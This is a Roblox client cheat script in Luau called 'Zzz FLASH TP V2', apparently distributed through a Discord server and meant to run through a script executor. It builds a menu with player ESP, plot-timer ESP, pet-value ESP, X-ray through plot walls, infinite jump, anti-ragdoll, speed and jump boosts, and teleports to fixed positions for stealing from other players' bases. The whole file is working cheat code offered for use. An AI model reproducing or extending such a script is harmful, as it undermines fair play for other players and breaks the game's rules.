local Players = game:GetService("Players")
local UserInputService = game:GetService("UserInputService")
local RunService = game:GetService("RunService")
local TweenService = game:GetService("TweenService")
local ProximityPromptService = game:GetService("ProximityPromptService")
local HttpService = game:GetService("HttpService")
local TeleportService = game:GetService("TeleportService")
local Lighting = game:GetService("Lighting")
local Workspace = game:GetService("Workspace")

local player = Players.LocalPlayer
local playerGui = player:WaitForChild("PlayerGui")
local isMobile = UserInputService.TouchEnabled and not UserInputService.MouseEnabled

-- // CONFIG SİSTEMİ //
local CONFIG_FILE = "Zzz_FlashTP_Config.json"
local Config = {
    flashEnabled = false, giantEnabled = false, espEnabled = false,
    playerESP = false, baseESP = false, bestPetESP = false, xray = false,
    fpsBooster = false, antiRagdoll = false, infiniteJump = false,
    alignCameraEnabled = false, Speed = 25, Jump = 40, sliderValue = 0.91
}

local function SaveConfig()
    if writefile then pcall(function() writefile(CONFIG_FILE, HttpService:JSONEncode(Config)) end) end
end
local function LoadConfig()
    if isfile and isfile(CONFIG_FILE) then
        local success, decoded = pcall(function() return HttpService:JSONDecode(readfile(CONFIG_FILE)) end)
        if success and decoded then for k, v in pairs(decoded) do Config[k] = v end end
    end
end
LoadConfig()

-- // SABİTLER VE TUŞ ATAMALARI //
local Keybinds = { AlignUp = Enum.KeyCode.T, AlignCamera = Enum.KeyCode.V, Boost = Enum.KeyCode.F, Kick = Enum.KeyCode.Q, Rejoin = Enum.KeyCode.R }
local DISCORD_NAME = "discord.gg/4Grv5VfK"
local ACCESSORIES_TO_REMOVE = {"Black Shield", "MechHorseHelmet_AccAccessory", "Glasses", "MeshPartAccessory", "LeftShoeAccessory", "RightShoeAccessory"}

local AimLocations = {
    Right = {{pos = Vector3.new(-330.7, -4.1, 94.5), aim = Vector3.new(-331.8, -5.0, 91.1)}, {pos = Vector3.new(-322.7, -4.1, 95.0), aim = Vector3.new(-324.8, -5.7, 91.1)}, {pos = Vector3.new(-316.5, -4.1, 93.9), aim = Vector3.new(-318.3, -4.9, 91.1)}, {pos = Vector3.new(-308.1, -4.1, 96.1), aim = Vector3.new(-311.5, -7.1, 91.1)}, {pos = Vector3.new(-301.5, -4.1, 94.6), aim = Vector3.new(-305.0, -6.0, 91.1)}},
    Left = {{pos = Vector3.new(-329.5, -4.2, 24.2), aim = Vector3.new(-331.5, -6.9, 29.1)}, {pos = Vector3.new(-324.2, -4.1, 23.6), aim = Vector3.new(-327.6, -7.8, 29.1)}, {pos = Vector3.new(-308.4, -4.1, 24.4), aim = Vector3.new(-307.5, -0.0, 20.3)}, {pos = Vector3.new(-308.1, -4.1, 25.4), aim = Vector3.new(-309.7, -5.0, 29.1)}, {pos = Vector3.new(-301.4, -4.1, 25.8), aim = Vector3.new(-302.1, -5.2, 29.1)}}
}

-- // GUI SETUP (KÜÇÜK VE KAYDIRMALI) //
local ScreenGui = Instance.new("ScreenGui", playerGui)
ScreenGui.Name = "Zzz_MainGUI"
ScreenGui.ResetOnSpawn = false

local Main = Instance.new("Frame", ScreenGui)
Main.Size = UDim2.new(0, 330, 0, 250) 
Main.Position = UDim2.new(0.5, -165, 0.5, -125)
Main.BackgroundColor3 = Color3.fromRGB(20, 15, 10) 
Main.BorderSizePixel = 0
Instance.new("UICorner", Main).CornerRadius = UDim.new(0, 10)

local BackgroundImage = Instance.new("ImageLabel", Main)
BackgroundImage.Size = UDim2.new(1, 0, 1, 0)
BackgroundImage.BackgroundTransparency = 1
BackgroundImage.Image = "rbxassetid://7141749507" 
BackgroundImage.ImageTransparency = 0.65 
BackgroundImage.ScaleType = Enum.ScaleType.Crop
BackgroundImage.ZIndex = 0
Instance.new("UICorner", BackgroundImage).CornerRadius = UDim.new(0, 10)

local Crown = Instance.new("ImageLabel", Main)
Crown.Size = UDim2.new(0, 90, 0, 90) 
Crown.Position = UDim2.new(0.5, 0, 0, -25) 
Crown.AnchorPoint = Vector2.new(0.5, 0.5)
Crown.BackgroundTransparency = 1
Crown.Image = "rbxassetid://8861218579" 
Crown.ImageColor3 = Color3.fromRGB(255, 215, 0) 
Crown.ZIndex = 10

local function createLiquidGradient(stroke)
    stroke.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
    local grad = Instance.new("UIGradient", stroke)
    grad.Color = ColorSequence.new({
        ColorSequenceKeypoint.new(0, Color3.fromRGB(50, 35, 15)), ColorSequenceKeypoint.new(0.3, Color3.fromRGB(218, 165, 32)), 
        ColorSequenceKeypoint.new(0.35, Color3.fromRGB(255, 245, 180)), ColorSequenceKeypoint.new(0.65, Color3.fromRGB(255, 245, 180)), 
        ColorSequenceKeypoint.new(0.7, Color3.fromRGB(218, 165, 32)), ColorSequenceKeypoint.new(1, Color3.fromRGB(50, 35, 15))
    })
    task.spawn(function() while stroke.Parent do grad.Rotation = (grad.Rotation + 1.5) % 360; task.wait(0.01) end end)
end

local MainStroke = Instance.new("UIStroke", Main)
MainStroke.Thickness = 1.5; MainStroke.Color = Color3.fromRGB(255, 255, 255)
createLiquidGradient(MainStroke)

local TitleBar = Instance.new("Frame", Main)
TitleBar.Size = UDim2.new(1, 0, 0, 35)
TitleBar.BackgroundColor3 = Color3.fromRGB(35, 25, 15)
TitleBar.BackgroundTransparency = 0.4; TitleBar.BorderSizePixel = 0; TitleBar.ZIndex = 2
Instance.new("UICorner", TitleBar).CornerRadius = UDim.new(0, 10)

local TitleLabel = Instance.new("TextLabel", TitleBar)
TitleLabel.Size = UDim2.new(1, 0, 1, 0); TitleLabel.BackgroundTransparency = 1
TitleLabel.Text = "Zzz FLASH TP V2"
TitleLabel.TextColor3 = Color3.fromRGB(255, 215, 0) ; TitleLabel.ZIndex = 2
pcall(function() TitleLabel.FontFace = Font.new("rbxasset://fonts/families/RobotoSlab.json", Enum.FontWeight.ExtraBold, Enum.FontStyle.Normal) end)
TitleLabel.TextSize = 18

-- DRAG MANTIĞI
local dragging, dragStart, startPos = false, nil, nil
TitleBar.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true; dragStart = input.Position; startPos = Main.Position end
end)
UserInputService.InputChanged:Connect(function(input)
    if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
        local delta = input.Position - dragStart
        Main.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
    end
end)
UserInputService.InputEnded:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = false end
end)

local DiscordLabel = Instance.new("TextLabel", Main)
DiscordLabel.Size = UDim2.new(1, 0, 0, 20); DiscordLabel.Position = UDim2.new(0, 0, 1, -22)
DiscordLabel.BackgroundTransparency = 1; DiscordLabel.Text = "Discord: " .. DISCORD_NAME
DiscordLabel.TextColor3 = Color3.fromRGB(255, 235, 150); DiscordLabel.Font = Enum.Font.GothamBold
DiscordLabel.TextSize = 13; DiscordLabel.ZIndex = 5

-- // SCROLLING FRAME //
local Content = Instance.new("ScrollingFrame", Main)
Content.Size = UDim2.new(1, -10, 1, -60)
Content.Position = UDim2.new(0, 5, 0, 40)
Content.BackgroundTransparency = 1
Content.BorderSizePixel = 0
Content.ScrollBarThickness = 4
Content.ScrollBarImageColor3 = Color3.fromRGB(218, 165, 32)
Content.CanvasSize = UDim2.new(0, 0, 0, 310) 
Content.ZIndex = 2

-- ==========================================
-- BACKEND SİSTEMLERİ
-- ==========================================
local playerHighlights, baseEspInstances, bestPetESPInst, xrayConn, baseEspConn, antiRagCharConn, IJ_JumpConn = {}, {}, nil, nil, nil, nil, nil
local bestPetActive = false

local function applyFPSBooster(on)
    pcall(function()
        if on then
            settings().Rendering.QualityLevel=Enum.QualityLevel.Level01
            Lighting.GlobalShadows=false; Lighting.FogEnd=9e8; Lighting.Brightness=1
            Lighting.EnvironmentDiffuseScale=0; Lighting.EnvironmentSpecularScale=0
            for _,obj in ipairs(workspace:GetDescendants()) do
                if obj:IsA("BasePart") or obj:IsA("MeshPart") then obj.Material=Enum.Material.Plastic; obj.Reflectance=0; obj.CastShadow=false end
                if obj:IsA("ParticleEmitter") or obj:IsA("Trail") or obj:IsA("Beam") then obj.Enabled=false end
            end
        else
            settings().Rendering.QualityLevel=Enum.QualityLevel.Automatic
            Lighting.GlobalShadows=true; Lighting.FogEnd=100000
            Lighting.EnvironmentDiffuseScale=1; Lighting.EnvironmentSpecularScale=1
        end
    end)
end

local function applyAntiRagdollToChar(char)
    if not char then return end
    local hum = char:FindFirstChildOfClass("Humanoid"); if not hum then return end
    pcall(function() hum:SetStateEnabled(Enum.HumanoidStateType.Ragdoll, false) end)
    pcall(function() hum:SetStateEnabled(Enum.HumanoidStateType.FallingDown, false) end)
end
local function startAntiRagdoll()
    applyAntiRagdollToChar(player.Character)
    if antiRagCharConn then antiRagCharConn:Disconnect() end
    antiRagCharConn = player.CharacterAdded:Connect(function(char) if Config.antiRagdoll then task.wait(0.1); applyAntiRagdollToChar(char) end end)
end
local function stopAntiRagdoll()
    if antiRagCharConn then antiRagCharConn:Disconnect(); antiRagCharConn=nil end
    local char=player.Character; if not char then return end
    local hum=char:FindFirstChildOfClass("Humanoid"); if not hum then return end
    pcall(function() hum:SetStateEnabled(Enum.HumanoidStateType.Ragdoll, true) end)
end

local function startInfiniteJump()
    if IJ_JumpConn then IJ_JumpConn:Disconnect() end
    IJ_JumpConn = UserInputService.JumpRequest:Connect(function()
        if not Config.infiniteJump then return end
        local char=player.Character; if not char then return end
        local root=char:FindFirstChild("HumanoidRootPart"); if not root then return end
        root.AssemblyLinearVelocity=Vector3.new(root.AssemblyLinearVelocity.X, 55, root.AssemblyLinearVelocity.Z)
    end)
end
local function stopInfiniteJump() if IJ_JumpConn then IJ_JumpConn:Disconnect(); IJ_JumpConn=nil end end

local function updatePlayerESP(on)
    if on then
        for _,p in pairs(Players:GetPlayers()) do
            if p~=player and p.Character then
                if not p.Character:FindFirstChild("ZzzESP") then
                    local hl = Instance.new("Highlight", p.Character); hl.Name = "ZzzESP"; hl.FillColor = Color3.fromRGB(70,130,200); hl.FillTransparency = 0.6
                end
            end
        end
    else
        for _,p in pairs(Players:GetPlayers()) do if p.Character and p.Character:FindFirstChild("ZzzESP") then p.Character.ZzzESP:Destroy() end end
    end
end

local function enableBaseESP()
    if baseEspConn then baseEspConn:Disconnect() end
    local lastScan = 0
    baseEspConn = RunService.Heartbeat:Connect(function()
        if tick() - lastScan < 0.5 then return end; lastScan = tick()
        local plots = workspace:FindFirstChild("Plots")
        if plots then
            for _, plot in pairs(plots:GetChildren()) do
                local timerLabel = nil
                for _, desc in pairs(plot:GetDescendants()) do
                    if desc.Name == "RemainingTime" and desc:IsA("TextLabel") then timerLabel = desc; break end
                end
                if timerLabel then
                    local mainPart = plot:FindFirstChild("Purchases") and plot.Purchases:FindFirstChild("PlotBlock") and plot.Purchases.PlotBlock:FindFirstChild("Main")
                    if mainPart then
                        if not baseEspInstances[plot] then
                            local bb = Instance.new("BillboardGui", mainPart); bb.Size = UDim2.new(0, 200, 0, 75); bb.StudsOffset = Vector3.new(0, 5, 0); bb.AlwaysOnTop = true
                            local lbl = Instance.new("TextLabel", bb); lbl.Size = UDim2.new(1,0,1,0); lbl.BackgroundTransparency = 1; lbl.TextColor3 = Color3.fromRGB(100, 200, 255); lbl.Font = Enum.Font.GothamBold; lbl.TextScaled = true; lbl.TextStrokeTransparency=0.3
                            baseEspInstances[plot] = bb
                        end
                        baseEspInstances[plot]:FindFirstChildOfClass("TextLabel").Text = timerLabel.Text
                    end
                end
            end
        end
    end)
end
local function disableBaseESP()
    if baseEspConn then baseEspConn:Disconnect(); baseEspConn=nil end
    for _,esp in pairs(baseEspInstances) do pcall(function() esp:Destroy() end) end; baseEspInstances={}
end

local function parsePetValue(text)
    if not text then return 0 end; text=tostring(text):gsub("%s",""):gsub("/s","")
    local numStr,suffix=text:match("([%d%.]+)([KkMmBbTt]?)"); if not numStr then return 0 end
    local mult=({K=1e3,M=1e6,B=1e9,T=1e12})[(suffix or ""):upper()] or 1
    return (tonumber(numStr) or 0)*mult
end
local function enableBestPetESP()
    if bestPetActive then return end; bestPetActive = true
    task.spawn(function()
        while bestPetActive do
            local debris = workspace:FindFirstChild("Debris")
            local best = {val = -1, part = nil, name = "", raw = ""}
            if debris then
                for _,item in ipairs(debris:GetChildren()) do
                    if item.Name == "FastOverheadTemplate" then
                        local sg = item:FindFirstChildOfClass("SurfaceGui")
                        if sg and sg.Adornee then
                            local gl = sg:FindFirstChild("Generation", true)
                            if gl and gl:IsA("TextLabel") then
                                local v = parsePetValue(gl.Text)
                                if v > best.val then
                                    local nl = sg:FindFirstChild("DisplayName", true)
                                    best = {val = v, part = sg.Adornee, name = nl and nl.Text or "?", raw = gl.Text}
                                end
                            end
                        end
                    end
                end
            end
            if best.part then
                if not bestPetESPInst then
                    bestPetESPInst = Instance.new("BillboardGui", playerGui); bestPetESPInst.Size = UDim2.new(0,100,0,30); bestPetESPInst.AlwaysOnTop = true; bestPetESPInst.StudsOffset = Vector3.new(0,-4,0)
                    local f = Instance.new("Frame", bestPetESPInst); f.Size = UDim2.new(1,0,1,0); f.BackgroundTransparency = 1
                    local nl = Instance.new("TextLabel", f); nl.Name="Name"; nl.Size = UDim2.new(1,0,0.5,0); nl.BackgroundTransparency=1; nl.TextColor3=Color3.fromRGB(255,255,255); nl.Font=Enum.Font.GothamBold; nl.TextScaled=true
                    local vl = Instance.new("TextLabel", f); vl.Name="Val"; vl.Size = UDim2.new(1,0,0.5,0); vl.Position=UDim2.new(0,0,0.5,0); vl.BackgroundTransparency=1; vl.TextColor3=Color3.fromRGB(100,200,255); vl.Font=Enum.Font.GothamBold; vl.TextScaled=true
                end
                bestPetESPInst.Adornee = best.part; bestPetESPInst.Enabled = true
                bestPetESPInst.Frame.Name.Text = best.name; bestPetESPInst.Frame.Val.Text = best.raw
            else
                if bestPetESPInst then bestPetESPInst.Enabled = false end
            end
            task.wait(0.5)
        end
    end)
end
local function disableBestPetESP() bestPetActive = false; if bestPetESPInst then bestPetESPInst.Enabled = false; bestPetESPInst.Adornee = nil end end

local function enableXRay()
    if xrayConn then xrayConn:Disconnect() end
    local lastX=0
    xrayConn=RunService.Heartbeat:Connect(function()
        if tick()-lastX<0.25 then return end; lastX=tick()
        local plots=workspace:FindFirstChild("Plots")
        if plots then
            for _,plot in ipairs(plots:GetChildren()) do
                if plot:IsA("Model") and plot:FindFirstChild("Decorations") then
                    for _,part in ipairs(plot.Decorations:GetDescendants()) do if part:IsA("BasePart") then part.LocalTransparencyModifier=0.85 end end
                end
            end
        end
    end)
end
local function disableXRay()
    if xrayConn then xrayConn:Disconnect(); xrayConn=nil end
    local plots=workspace:FindFirstChild("Plots")
    if plots then
        for _,plot in ipairs(plots:GetChildren()) do
            if plot:IsA("Model") and plot:FindFirstChild("Decorations") then
                for _,part in ipairs(plot.Decorations:GetDescendants()) do if part:IsA("BasePart") then part.LocalTransparencyModifier=0 end end
            end
        end
    end
end

-- ==========================================
-- UI OLUŞTURUCULAR VE BAĞLANTILAR
-- ==========================================
local function createToggle(xOffset, yOffset, text, toggleVar, callback)
    local row = Instance.new("Frame", Content); row.Size = UDim2.new(0, 150, 0, 22); row.Position = UDim2.new(0, xOffset, 0, yOffset); row.BackgroundTransparency = 1; row.ZIndex = 2
    local label = Instance.new("TextLabel", row); label.Size = UDim2.new(0.65, 0, 1, 0); label.BackgroundTransparency = 1; label.Text = text; label.TextColor3 = Color3.fromRGB(255, 235, 150); label.TextSize = 11; label.TextXAlignment = Enum.TextXAlignment.Left; label.ZIndex = 2
    pcall(function() label.FontFace = Font.new("rbxasset://fonts/families/RobotoSlab.json", Enum.FontWeight.Bold, Enum.FontStyle.Normal) end)
    
    local track = Instance.new("Frame", row); track.Size = UDim2.new(0, 36, 0, 14); track.Position = UDim2.new(1, -36, 0.5, -7); track.BackgroundColor3 = Config[toggleVar] and Color3.fromRGB(218, 165, 32) or Color3.fromRGB(45, 35, 25); track.ZIndex = 2
    Instance.new("UICorner", track).CornerRadius = UDim.new(1, 0)
    local stroke = Instance.new("UIStroke", track); stroke.Thickness = 1.4; stroke.Color = Color3.fromRGB(255, 255, 255); createLiquidGradient(stroke)
    
    local circle = Instance.new("Frame", track); circle.Size = UDim2.new(0, 10, 0, 10); circle.AnchorPoint = Vector2.new(0, 0.5); circle.Position = Config[toggleVar] and UDim2.new(1, -12, 0.5, 0) or UDim2.new(0, 2, 0.5, 0); circle.BackgroundColor3 = Color3.fromRGB(255, 245, 180); circle.ZIndex = 3
    Instance.new("UICorner", circle).CornerRadius = UDim.new(1, 0)
    
    local btn = Instance.new("TextButton", row); btn.Size = UDim2.new(1, 0, 1, 0); btn.BackgroundTransparency = 1; btn.Text = ""; btn.ZIndex = 4
    btn.MouseButton1Click:Connect(function()
        Config[toggleVar] = not Config[toggleVar]
        TweenService:Create(track, TweenInfo.new(0.2), {BackgroundColor3 = Config[toggleVar] and Color3.fromRGB(218, 165, 32) or Color3.fromRGB(45, 35, 25)}):Play()
        TweenService:Create(circle, TweenInfo.new(0.2), {Position = Config[toggleVar] and UDim2.new(1, -12, 0.5, 0) or UDim2.new(0, 2, 0.5, 0)}):Play()
        SaveConfig()
        if callback then callback(Config[toggleVar]) end
    end)
end

local function createLiquidButton(xOffset, yOffset, text)
    local btn = Instance.new("TextButton", Content); btn.Size = UDim2.new(0, 150, 0, 24); btn.Position = UDim2.new(0, xOffset, 0, yOffset); btn.BackgroundColor3 = Color3.fromRGB(35, 25, 20); btn.Text = text; btn.TextColor3 = Color3.fromRGB(255, 235, 150); btn.TextSize = 11; btn.AutoButtonColor = false; btn.ZIndex = 3
    Instance.new("UICorner", btn).CornerRadius = UDim.new(1, 0)
    pcall(function() btn.FontFace = Font.new("rbxasset://fonts/families/RobotoSlab.json", Enum.FontWeight.Bold, Enum.FontStyle.Normal) end)
    local stroke = Instance.new("UIStroke", btn); stroke.Thickness = 1.5; stroke.Color = Color3.fromRGB(255, 255, 255); createLiquidGradient(stroke)
    btn.InputBegan:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 or i.UserInputType == Enum.UserInputType.Touch then TweenService:Create(btn, TweenInfo.new(0.1), {Size = UDim2.new(0, 140, 0, 21), BackgroundColor3 = Color3.fromRGB(60, 45, 25)}):Play() end end)
    btn.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 or i.UserInputType == Enum.UserInputType.Touch then TweenService:Create(btn, TweenInfo.new(0.35, Enum.EasingStyle.Back), {Size = UDim2.new(0, 150, 0, 24), BackgroundColor3 = Color3.fromRGB(35, 25, 20)}):Play() end end)
    btn.MouseLeave:Connect(function() TweenService:Create(btn, TweenInfo.new(0.35, Enum.EasingStyle.Back), {Size = UDim2.new(0, 150, 0, 24), BackgroundColor3 = Color3.fromRGB(35, 25, 20)}):Play() end)
    return btn
end

local function createStatPill(xOffset, yOffset, prefix, configKey)
    local pill = Instance.new("Frame", Content); pill.Size = UDim2.new(0, 150, 0, 24); pill.Position = UDim2.new(0, xOffset, 0, yOffset); pill.BackgroundColor3 = Color3.fromRGB(35, 25, 20); pill.BorderSizePixel = 0; pill.ZIndex = 2
    Instance.new("UICorner", pill).CornerRadius = UDim.new(1, 0)
    local stroke = Instance.new("UIStroke", pill); stroke.Thickness = 1.5; stroke.Color = Color3.fromRGB(255, 255, 255); createLiquidGradient(stroke)

    local valBox = Instance.new("TextBox", pill); valBox.Size = UDim2.new(1, -50, 1, 0); valBox.Position = UDim2.new(0, 25, 0, 0); valBox.BackgroundTransparency = 1; valBox.Text = prefix .. ": " .. tostring(Config[configKey]); valBox.TextColor3 = Color3.fromRGB(255, 230, 100); valBox.TextSize = 11; valBox.ZIndex = 3
    pcall(function() valBox.FontFace = Font.new("rbxasset://fonts/families/RobotoSlab.json", Enum.FontWeight.Bold, Enum.FontStyle.Normal) end)

    local btnMinus = Instance.new("TextButton", pill); btnMinus.Size = UDim2.new(0, 25, 1, 0); btnMinus.Position = UDim2.new(0, 0, 0, 0); btnMinus.BackgroundTransparency = 1; btnMinus.Text = "-"; btnMinus.TextColor3 = Color3.fromRGB(218, 165, 32); btnMinus.TextSize = 16; btnMinus.ZIndex = 4
    btnMinus.MouseButton1Click:Connect(function() Config[configKey] = Config[configKey] - 1; valBox.Text = prefix .. ": " .. tostring(Config[configKey]); SaveConfig() end)

    local btnPlus = Instance.new("TextButton", pill); btnPlus.Size = UDim2.new(0, 25, 1, 0); btnPlus.Position = UDim2.new(1, -25, 0, 0); btnPlus.BackgroundTransparency = 1; btnPlus.Text = "+"; btnPlus.TextColor3 = Color3.fromRGB(218, 165, 32); btnPlus.TextSize = 14; btnPlus.ZIndex = 4
    btnPlus.MouseButton1Click:Connect(function() Config[configKey] = Config[configKey] + 1; valBox.Text = prefix .. ": " .. tostring(Config[configKey]); SaveConfig() end)
    return pill
end

-- // SOL SÜTUN //
createToggle(0, 0, "Flash TP:", "flashEnabled")
createToggle(0, 26, "Giant Potion:", "giantEnabled")
createToggle(0, 52, "Player ESP:", "playerESP", updatePlayerESP)
createToggle(0, 78, "Base ESP:", "baseESP", function(on) if on then enableBaseESP() else disableBaseESP() end end)
createToggle(0, 104, "Pet ESP:", "bestPetESP", function(on) if on then enableBestPetESP() else disableBestPetESP() end end)
createToggle(0, 130, "X-Ray:", "xray", function(on) if on then enableXRay() else disableXRay() end end)
createToggle(0, 156, "FPS Boost:", "fpsBooster", applyFPSBooster)
createToggle(0, 182, "Anti Ragdoll:", "antiRagdoll", function(on) if on then startAntiRagdoll() else stopAntiRagdoll() end end)
createToggle(0, 208, "Infinite Jump:", "infiniteJump", function(on) if on then startInfiniteJump() else stopInfiniteJump() end end)

-- // SAĞ SÜTUN //
createStatPill(160, 0, "SPEED", "Speed")
createStatPill(160, 28, "JUMP", "Jump")
local btnBoost = createLiquidButton(160, 56, "ACTIVATE BOOST (F)")
local btnAlignUp = createLiquidButton(160, 84, "ALIGN UP [T]")
local btnAlignCam = createLiquidButton(160, 112, "ALIGN CAM [V]")
local btnKick = createLiquidButton(160, 140, "KICK [Q]")
local btnRejoin = createLiquidButton(160, 168, "REJOIN [R]")

-- // SLIDER VE STEAL BAR (EN ALTTA) //
local SliderArea = Instance.new("Frame", Content); SliderArea.Size = UDim2.new(0, 150, 0, 28); SliderArea.Position = UDim2.new(0, 0, 0, 240); SliderArea.BackgroundTransparency = 1; SliderArea.ZIndex = 2
local TriggerLabel = Instance.new("TextLabel", SliderArea); TriggerLabel.Size = UDim2.new(1, 0, 0, 12); TriggerLabel.BackgroundTransparency = 1; TriggerLabel.Text = "Zzz TRIGGER: "..math.floor(Config.sliderValue*100).."%"; TriggerLabel.TextColor3 = Color3.fromRGB(255, 235, 150); TriggerLabel.TextSize = 10; TriggerLabel.TextXAlignment = Enum.TextXAlignment.Left; TriggerLabel.ZIndex = 3; pcall(function() TriggerLabel.FontFace = Font.new("rbxasset://fonts/families/RobotoSlab.json", Enum.FontWeight.SemiBold, Enum.FontStyle.Normal) end)
local SliderTrack = Instance.new("Frame", SliderArea); SliderTrack.Size = UDim2.new(1, 0, 0, 4); SliderTrack.Position = UDim2.new(0, 0, 0, 16); SliderTrack.BackgroundColor3 = Color3.fromRGB(45, 35, 25); SliderTrack.ZIndex = 3; Instance.new("UICorner", SliderTrack).CornerRadius = UDim.new(1, 0)
local SliderFill = Instance.new("Frame", SliderTrack); SliderFill.Size = UDim2.new(Config.sliderValue, 0, 1, 0); SliderFill.BackgroundColor3 = Color3.fromRGB(255, 215, 0); SliderFill.ZIndex = 4; Instance.new("UICorner", SliderFill).CornerRadius = UDim.new(1, 0)
local SliderKnob = Instance.new("TextButton", SliderTrack); SliderKnob.Size = UDim2.new(0, 10, 0, 10); SliderKnob.Position = UDim2.new(Config.sliderValue, 0, 0.5, 0); SliderKnob.AnchorPoint = Vector2.new(0.5, 0.5); SliderKnob.BackgroundColor3 = Color3.fromRGB(255, 255, 200); SliderKnob.Text = ""; SliderKnob.ZIndex = 5; Instance.new("UICorner", SliderKnob).CornerRadius = UDim.new(1, 0)

local sliderDragging = false
local function updateSlider(x)
    local pct = math.clamp((x - SliderTrack.AbsolutePosition.X) / SliderTrack.AbsoluteSize.X, 0, 1); Config.sliderValue = pct
    SliderFill.Size = UDim2.new(pct, 0, 1, 0); SliderKnob.Position = UDim2.new(pct, 0, 0.5, 0); TriggerLabel.Text = "Zzz TRIGGER: " .. math.floor(pct * 100) .. "%"; SaveConfig()
end
SliderKnob.MouseButton1Down:Connect(function() sliderDragging = true end)
SliderTrack.InputBegan:Connect(function(inp) if inp.UserInputType == Enum.UserInputType.MouseButton1 then sliderDragging = true; updateSlider(inp.Position.X) end end)
UserInputService.InputChanged:Connect(function(inp) if sliderDragging and (inp.UserInputType == Enum.UserInputType.MouseMovement or inp.UserInputType == Enum.UserInputType.Touch) then updateSlider(inp.Position.X) end end)
UserInputService.InputEnded:Connect(function(inp) if inp.UserInputType == Enum.UserInputType.MouseButton1 or inp.UserInputType == Enum.UserInputType.Touch then sliderDragging = false end end)

local StealBarBG = Instance.new("Frame", Content); StealBarBG.Size = UDim2.new(0, 310, 0, 8); StealBarBG.Position = UDim2.new(0, 0, 0, 280); StealBarBG.BackgroundColor3 = Color3.fromRGB(45, 35, 25); StealBarBG.BorderSizePixel = 0; StealBarBG.ZIndex = 2; Instance.new("UICorner", StealBarBG).CornerRadius = UDim.new(0, 4)
local StealFill = Instance.new("Frame", StealBarBG); StealFill.Size = UDim2.new(0, 0, 1, 0); StealFill.BackgroundColor3 = Color3.fromRGB(255, 245, 180); StealFill.ZIndex = 3; Instance.new("UICorner", StealFill).CornerRadius = UDim.new(0, 4)

-- Başlangıç Yüklemeleri
if Config.fpsBooster then applyFPSBooster(true) end
if Config.antiRagdoll then startAntiRagdoll() end
if Config.infiniteJump then startInfiniteJump() end
if Config.playerESP then updatePlayerESP(true) end
if Config.baseESP then enableBaseESP() end
if Config.bestPetESP then enableBestPetESP() end
if Config.xray then enableXRay() end

-- // TUŞLAR, KICK, REJOIN VE BOOST SİSTEMİ //
local function GetNearestPoint()
    local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart"); if not hrp then return nil end
    local myPos, target, minDist = hrp.Position, nil, math.huge
    for _, side in pairs({AimLocations.Right, AimLocations.Left}) do
        for _, point in ipairs(side) do
            local dist = (myPos - point.pos).Magnitude
            if dist < minDist then minDist = dist; target = point end
        end
    end
    return target
end

local function PerformAlign(p, a)
    local char = player.Character; local hrp = char and char:FindFirstChild("HumanoidRootPart"); local hum = char and char:FindFirstChildOfClass("Humanoid")
    if hrp and hum then
        local carpet = char:FindFirstChild("flying") or (player:FindFirstChild("Backpack") and player.Backpack:FindFirstChild("flying"))
        if carpet and carpet.Parent ~= char then hum:EquipTool(carpet) end
        hrp.Velocity = Vector3.new(0,0,0); hrp.CFrame = CFrame.new(p)
        local cam = Workspace.CurrentCamera; if cam and char:FindFirstChild("Head") then cam.CFrame = CFrame.lookAt(char.Head.Position, a) end
    end
end

local boostEnabled, boostConn = false, nil
local function toggleBoost()
    boostEnabled = not boostEnabled; btnBoost.Text = boostEnabled and "ACTIVATED (F)" or "ACTIVATE BOOST (F)"; btnBoost.BackgroundColor3 = boostEnabled and Color3.fromRGB(218, 165, 32) or Color3.fromRGB(35, 25, 20)
    local hum = player.Character and player.Character:FindFirstChildOfClass("Humanoid")
    if boostEnabled then
        if hum then hum.UseJumpPower = true; hum.JumpPower = Config.Jump end
        if boostConn then boostConn:Disconnect() end
        boostConn = RunService.Heartbeat:Connect(function()
            local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
            if hrp and hum and hum.MoveDirection.Magnitude > 0 then
                local flatDir = Vector3.new(hum.MoveDirection.X, 0, hum.MoveDirection.Z).Unit
                hrp.Velocity = Vector3.new(flatDir.X * Config.Speed, hrp.Velocity.Y, flatDir.Z * Config.Speed)
            end
        end)
    else
        if boostConn then boostConn:Disconnect(); boostConn = nil end
        if hum then hum.JumpPower = 50 end
    end
end

btnBoost.MouseButton1Click:Connect(toggleBoost)
btnAlignUp.MouseButton1Click:Connect(function() local n = GetNearestPoint() if n then PerformAlign(n.pos, n.aim) end end)
btnAlignCam.MouseButton1Click:Connect(function()
    local cam = workspace.CurrentCamera; if cam then cam.CFrame = CFrame.new(cam.CFrame.Position, cam.CFrame.Position + Vector3.new(cam.CFrame.LookVector.X, math.sin(math.rad(28.4)), cam.CFrame.LookVector.Z)) end
end)
btnKick.MouseButton1Click:Connect(function() player:Kick("Zzz Flash TP v2") end)
btnRejoin.MouseButton1Click:Connect(function()
    if #Players:GetPlayers() <= 1 then TeleportService:Teleport(game.PlaceId, player) else TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, player) end
end)

UserInputService.InputBegan:Connect(function(input, gpe)
    if UserInputService:GetFocusedTextBox() then return end
    if input.KeyCode == Keybinds.Boost then toggleBoost()
    elseif input.KeyCode == Keybinds.AlignUp then local n = GetNearestPoint() if n then PerformAlign(n.pos, n.aim) end
    elseif input.KeyCode == Keybinds.AlignCamera then local cam = workspace.CurrentCamera; if cam then cam.CFrame = CFrame.new(cam.CFrame.Position, cam.CFrame.Position + Vector3.new(cam.CFrame.LookVector.X, math.sin(math.rad(28.4)), cam.CFrame.LookVector.Z)) end
    elseif input.KeyCode == Keybinds.Kick then player:Kick("Zzz Flash TP v2")
    elseif input.KeyCode == Keybinds.Rejoin then if #Players:GetPlayers() <= 1 then TeleportService:Teleport(game.PlaceId, player) else TeleportService:TeleportToPlaceInstance(game.PlaceId, game.JobId, player) end
    end
end)

